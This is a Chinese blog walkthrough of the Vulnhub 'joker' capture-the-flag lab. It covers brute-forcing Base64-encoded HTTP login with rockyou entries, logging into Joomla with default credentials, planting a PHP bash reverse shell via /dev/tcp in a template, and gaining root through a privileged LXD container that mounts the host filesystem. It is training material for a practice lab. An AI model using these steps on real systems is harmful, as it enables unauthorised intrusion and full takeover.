渗透测试-vulnhub靶机 joker

于 2023-11-23 19:03:03 发布
阅读量101 收藏
点赞数
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79441074/article/details/134584051
版权

信息收集

ip端口扫描

 访问80端口

敏感目录扫描,发现秘密文件

访问secret.txt

发现多次提到rock,暗示用kali里面的rockyou字典的前100个进行密码爆破,字典路径/usr/share/wordlists,解压

访问8080端口http服务,发现需要账号密码

bp 密码爆破

输入用户名joker,密码随便输一个,123,发现账号密码加密

复制到base在线解密发现是自己输入的账号密码

 bp密码爆破,发送到测试器标记一下

设置用户名设置密码字典,由于rock密码有1400万我们复制前100

选择给账号密码base64加密

开始攻击,爆破出密码

base64解密

登陆8080端口

getshell

登录后,发现8080端口web服务为 Joomla CMS。Joomla 默认后台地址: /administrator。默认用户密码 joomla/joomla

 

 使用默认账号密码joomla/joomla进行登陆,登陆成功

点击模板

选择

进入到模板

kali 开启 nc 监听

书写反弹shell

<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/ip/ports 0>&1'");
?>

点击Template Preview

反弹shell成功

 kali配置代理

github下载镜像

使用LXD提升权限,执行以下操作

git clone https://github.com/saghul/lxd-alpine-builder.git
 
cd lxd-alpine-builder
 
ls
 
./build-alpine
 
ls

kali 开启python2 -m SimpleHTTPServer

靶机下载

wget http://192.168.91.134:8000/alpine-v3.13-x86_64-20210218_0139.tar.gz
 
lxc image import ./alpine-v3.13-x86_64-20210218_0139.tar.gz --alias myimage
 
lxc image list

lxd 提权

靶机执行以下命令获取flag

lxc init myimage ignite -c security.privileged=true
 
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
 
lxc start ignite
 
lxc exec ignite /bin/sh
 
id
 
cd /mnt/root/root
 
ls
 
cat final.txt

获取root权限

打开flags,通关

HSY233233
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
vulhub靶机joker渗透
qq_56666960的博客
02-07 2913
vulhub靶机joker渗透
phpMyAdmin及Joomla数据库问题
hellozheng的专栏
04-22 1719
使用phpMyAdmin修改Joomla默认root的登录密码,以变成自定义的密码增加安全性在PhpMyAdmin
Joomla网站安全防护指南
sixeit的博客
12-23 372
上一次Joomla 0day漏洞让很多使用joomla的网站挂掉,这个确实很无奈,毕竟只要是程序,就会有漏洞,就有被攻破的可能。我们能做的就是尽最大可能防止自己的网站被黑掉。 一般常见的攻击路径有两种:服务器和网站程序。对于服务器的安全不是我们讨论的话题,那是主机商的事,我们能做的就是自己网站程序的安全防范。对于Joomla网站,建议做好以下几个方面的防范: 是否使用的是最新版本 Joomla! 这个是非常重要的,时刻关注Joomla的版本更新,及时将自己的网站更新到最新版。 是否使用的是最新版的第三方扩展
登录Joomla管理后台
最新发布
onne2023的博客
07-24 623
登录Joomla管理后台
Joomla】如何重置网站管理员密码
SQL5560的专栏
07-26 2963
简单点说吧,我们有时候会把Joomla的管理员(admin)密码给忘了,如何重置? 我会直接修改数据库: 1,用phpMyAdmin打开MySQL; 2,在左边点击你的Joomla网站对应的数据库,在右边找到并点击“_user”后缀的表; 3,在username是“admin”的记录前面点击“编辑”,进入整个记录的编辑页面; 4,找到password,用下面这串字符替换方格里面的内容
Joomla安装图文教程 (送 Joomla 中文语言包)
weixin_33713350的博客
04-10 240
1、首先下载Joomla源程序 首页:http://www.joomla.org/download.html 下载:download 2、为论坛创建数据库。进入cPanel面板,选择mysqldatabase选项,新建数据库(数据库名:joomla), 新建数据库用户(用户名:joo123、密码:123456),在下面将这个数据库用户添加到数据库中,...
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
如何恢复重设Joomla!超级管理员密码
06-24
本教程要解决的问题就是:忘记了唯一一个超级管理员帐号的密码,由于后台发送邮件的机制设置不正确也无法取回密码,这种情况下如何恢复 Joomla! 超级管理员的密码?
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
复位joomla后台管理员密码
weixin_33797791的博客
06-20 1492
首先需要清楚的是你的超级管理员用户是不是输入错误:一般为admin 也有人改为administrator。 一般人用 Joomla! 建网站时,都是在安装过程中产生一个超级管理员帐号,再也没有其他管理人员的帐号了。也就是说,只有超级管理员能从后台登录来管理网站。按理说这个帐号应该是牢记的,站长本人不应该忘记超级管理员的密码。 但是有的站长管理多个网站,或者有些...
Joomla 用户密码的生成原理
CC专栏
01-21 4487
在网上看了许多有关Joomla用户密码的问题,有好多人对此有些疑问,也有些人说Joomla的密码不是md5加密的。这里,我想大概说一下Joomla用户密码的生成过程。 当然,Joomla对密码的加密方式有很多种,有ssha、md5、base64等等,但是因为我们很少触及这些设置,所以大多数还是在使用默认的md5加密方式。 有些人会问:为什么同样的密码每次加密后的结果都不一样呢?原因就是因为Joomla在加密的时候添加了一个随机key。由于这个key是随机的,所以每次加密后的结果也会不一样。
VulnHub----DC1靶场记录
x1871329637的博客
04-26 3181
00-环境介绍 靶机下载地址:DC: 1 ~ VulnHub 攻击机:kali2022:192.168.200.129 DC1:192.168.200.135 目标:拿到5个flag 1由于这是一次黑盒测试所以只能根据目标mac地址来确认靶机的ip信息 由此判定靶机ip为192.168.200.135 2nmap直接扫 nmap -A 192.168.200.135 -p 1-65535 由此可见开放了22 80 111 42892端口,可以先去访问一下80端口 .
渗透测试——joker靶场漏洞复现
人若有志,就不会在半坡停止。
10-21 1718
目标的子域是一个重要的测试点,你收集到的可用的子域名越多,意味着你的机会也就越多,所以说要尽可能的收集目标的子域名。一个网站可能会开放多个不同的端口,而我们可以通过同一网站的不同端口进行测试,扫描开放端口的方法有很多,这里我分为两种:第一种在线端口扫描,第二种利用工具扫描端口。目录扫描我分为两种:一种时在线目录扫描,一种是利用工具扫描目录。信息收集方式:扫描(端口扫描、漏洞扫描)、公开信息(搜索引擎、网站、论坛、媒体报道、微步社区、潮汐指纹、站长之家、子域名挖掘、备案号)、其他方式(钓鱼邮件、社工)
oscp——htb——Joker
王嘟嘟的博客
07-14 505
0x00 前言 这个机子可以了解到Squid相关的知识,如果不是这个机子,我可能都不可能会接触到这个东西。 0x01 信息收集 0x02 Web——Webshell 这里有一个3128开放,我找了历史漏洞但是都没有利用成功。 最后才知道可以将3128当做代理。但是我linux本地又有问题,所以只能使用ew进行端口的正向映射出来。 但是代理挂好之后要求输入密码,那么这里要从另外一个方面入手了。 使用tftp进行连接 然后获取squid相关内容 /etc/squid/squid.conf /etc/squ
Vulnhub 靶机实战系列:DC -3网站管理员账号密码和系统提权
weixin_50815573的博客
03-03 4525
Vulnhub 靶机实战系列:DC -3网站管理员账号密码和系统提权 搭建测试靶机 下载地址:DC: 3.2 ~ VulnHub 则靶机DC-3 ip:192.168.1.106(NAT连接) 攻击机kali linux ip:192.168.1.237 信息收集 使用:nmap -sP 192.168.0.0/24 进行扫描找到目标靶机 对目标靶机进行端口扫描 利用nmap对目标主机进行端口扫描,发现开放端口:80 使用命令:nmap -A -p- -T4 192.168.1.106
海贼王渗透靶场 Vulnhub:Billu_Box
qq_47168481的博客
09-26 625
海贼王渗透靶场
渗透DC-1靶机设计思路
05-24
设计思路: 1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如Nessus、OpenVAS等扫描DC-1,寻找漏洞。 4. 渗透攻击:根据扫描结果,利用漏洞进行攻击。可以使用一些常见的攻击手段,如SQL注入、XSS、文件包含、远程代码执行等。 5. 提升权限:在攻击成功后,需要提升自己的权限,获取更高的权限。可以使用一些提权工具,如Metasploit。 6. 横向移动:在获得了足够的权限后,可以尝试横向移动,进一步渗透网络。 7. 维持访问:在渗透成功后,需要维持访问,以便长期监控目标。 8. 清理痕迹:在攻击结束后,需要清理自己留下的痕迹,以免被发现。 以上是一个基本的渗透DC-1靶机的设计思路,但是具体实施过程中需要根据实际情况进行调整和优化。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值